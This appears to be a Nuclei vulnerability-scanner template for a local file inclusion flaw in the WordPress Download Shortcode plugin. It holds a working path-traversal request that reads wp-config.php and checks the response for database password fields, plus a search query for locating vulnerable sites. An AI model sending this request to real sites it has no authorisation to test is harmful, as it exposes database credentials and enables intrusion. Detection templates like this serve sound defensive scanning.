id: shortcode-lfi

info:
  name: WordPress Download Shortcode 0.2.3 - Local File Inclusion
  author: dhiyaneshDK
  severity: high
  description: WordPress Download Shortcode 0.2.3 is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. Prior versions may also be affected.
  reference:
    - https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
    google-query: inurl:wp/wp-content/force-download.php
  tags: lfi,shortcode,wp,packetstorm,wordpress,wp-plugin

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/force-download.php?file=../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100b33ed53992d62096fe207a29a03bac58a3808e58d34ae3678139f7d1263b68940221009970896cc935fcb931efe291401a742328ad28d443b8356bd08932e0a96025f9:922c64590222798bb761d5b6d8e72950
